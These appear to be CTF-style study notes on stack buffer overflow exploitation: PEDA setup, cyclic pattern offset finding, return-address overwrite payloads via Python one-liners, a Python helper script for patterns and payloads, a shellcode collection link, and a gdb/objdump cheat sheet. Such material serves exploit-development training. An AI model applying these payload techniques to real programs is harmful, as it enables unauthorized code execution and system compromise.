Install GDB
sudo apt install gdb
git clone https://github.com/longld/peda.git ~/peda
To load PEDA permanently (every time gdb starts):
echo "source ~/peda/peda.py" >> ~/.gdbinit
If you do not want it permanent, load it manually inside gdb:
gdb
source ~/peda/peda.py
Finding the buffer offset (when the distance to the saved return address is unknown):
run gdb with PEDA loaded
gdb ./(elf)
source ~/peda/peda.py
pattern create 100
for example this pattern is produced:
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL
then run the program:
run
when it asks for input, paste the pattern:
enter input blablabla : AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL
the point is to keep going (longer pattern if needed) until you get a segmentation fault
check the offset using the value that landed in EIP at the crash (a register value, not a memory address):
pattern offset <value-in-EIP>
(PEDA's "pattern search" does the same for every register and stack slot at once; on 64-bit RIP usually keeps its old value because a non-canonical address is refused, so look at RSP instead)
say the offset is 52: the payload is then 52 bytes of filler followed by the address you want to jump to
sending the payload
python -c "print 'a'*52+'\xef\xbe\xad\xde'" | ./(elf)
(Python 2 syntax; \xef\xbe\xad\xde is 0xdeadbeef in little-endian byte order, as x86 expects. Python 3 equivalent, writing raw bytes instead of text:)
python3 -c "import sys; sys.stdout.buffer.write(b'a'*52 + b'\xef\xbe\xad\xde')" | ./(elf)
if the payload spawns a shell, keep stdin open with cat so the shell does not exit on EOF:
(python -c "print 'a'*52+'\xef\xbe\xad\xde'";cat) | ./(elf)
*if every byte of the address is printable ASCII, you can type the characters directly instead of hex escapes
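As an added example (not from the original notes and not PEDA's own code), the script below reproduces the pattern create / pattern offset / payload steps above offline, so the offset arithmetic and the little-endian packing can be checked without a gdb session. It generates the Metasploit-style cyclic pattern (Aa0Aa1Aa2...) rather than PEDA's charset, so only feed it crash values taken from patterns it generated itself. The names pattern_create, pattern_offset, build_payload and typeable are chosen here.

```python
"""
Offline stand-in for PEDA's "pattern create" / "pattern offset" plus the
payload builder from the notes. Added example, not part of PEDA: the pattern
is the Metasploit-style cyclic pattern, NOT PEDA's charset, so offsets are
only valid for patterns produced by this script.
"""
import struct
import sys

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGITS = "0123456789"
# 26 * 26 * 10 triples of 3 bytes = 20280 bytes before the pattern repeats
MAX_UNIQUE = len(UPPER) * len(LOWER) * len(DIGITS) * 3


def pattern_create(length):
    """Cyclic pattern in which every 4-byte window is unique (up to MAX_UNIQUE bytes)."""
    if length > MAX_UNIQUE:
        raise ValueError("pattern longer than %d bytes would repeat" % MAX_UNIQUE)
    out = []
    for u in UPPER:
        for l in LOWER:
            for d in DIGITS:
                out.append(u + l + d)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def pattern_offset(crash_value, bits=32, length=MAX_UNIQUE):
    """
    Offset of the bytes that landed in a register at the crash.
    crash_value may be an int (register contents, read little-endian as x86
    stores them), a str fragment copied from the pattern, or raw bytes.
    Returns -1 when the value does not come from this pattern, e.g. when the
    pattern never reached the saved return address.
    """
    fmt = "<I" if bits == 32 else "<Q"
    if isinstance(crash_value, int):
        needle = struct.pack(fmt, crash_value)
    elif isinstance(crash_value, str):
        needle = crash_value.encode("ascii")
    else:
        needle = bytes(crash_value)
    return pattern_create(length).encode("ascii").find(needle)


def build_payload(offset, ret_addr, filler=b"a", bits=32):
    """filler * offset followed by ret_addr packed little-endian (0xdeadbeef -> ef be ad de)."""
    fmt = "<I" if bits == 32 else "<Q"
    return filler * offset + struct.pack(fmt, ret_addr)


def typeable(addr, bits=32):
    """The packed address as ASCII if all its bytes are printable (can be typed directly), else None."""
    raw = struct.pack("<I" if bits == 32 else "<Q", addr)
    if all(0x20 <= b < 0x7F for b in raw):
        return raw.decode("ascii")
    return None


if __name__ == "__main__":
    # usage: python3 pattern.py create 100 | ./target
    #        python3 pattern.py offset 0x62413762
    #        python3 pattern.py payload 52 0xdeadbeef | ./target
    if len(sys.argv) < 3:
        sys.exit("usage: create <len> | offset <value> | payload <offset> <addr>")
    cmd, args = sys.argv[1], sys.argv[2:]
    if cmd == "create":
        sys.stdout.write(pattern_create(int(args[0])))
    elif cmd == "offset":
        print(pattern_offset(int(args[0], 0)))
    elif cmd == "payload":
        # raw bytes, not text: a print() would add a newline and mangle non-ASCII bytes
        sys.stdout.buffer.write(build_payload(int(args[0]), int(args[1], 0)))
```

The payload subcommand writes through sys.stdout.buffer for the same reason the Python 3 one-liner above does: the return address bytes are not text, and a trailing newline would land on the stack after them.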
shellcode collection for payloads: http://shell-storm.org/shellcode/
feeding input inside a running gdb session
(gdb) r <<< $(python -c "print '\xde\xad\xbe\xef'")
(gdb) r <<< $(python -c "print 0xdeadbeef")
*still messy (not recommended)
Why these are unreliable: the first sends the bytes in the order written, so on little-endian x86 EIP ends up as 0xefbeadde rather than 0xdeadbeef (reverse the bytes as in the payload above); the second prints the decimal text 3735928559, not 4 raw bytes; and $(...) strips trailing newlines and cannot carry NUL bytes. More robust: write the payload to a file and run "r < payload", or use process substitution "r < <(python -c ...)".
Cheat sheet
gdb
set disassembly-flavor intel
(the option is "disassembly-flavor"; "set disassembly intel" is rejected by gdb)
x/10i main
x/10i win
(plain "x main" only dumps one word at main; /10i disassembles 10 instructions)
p main
(prints the address of main; the same works for win, which is what you put in the return-address slot)
define hook-stop
info registers
x/10i $eip-8
x/36wx $esp
end
(hook-stop runs these commands every time the program stops: breakpoint, step or crash)
Objdump
objdump -x <file>    (all headers)
objdump -d <file>    (disassemble; add -M intel for Intel syntax)
objdump -t <file>    (symbol table, e.g. to find the address of win)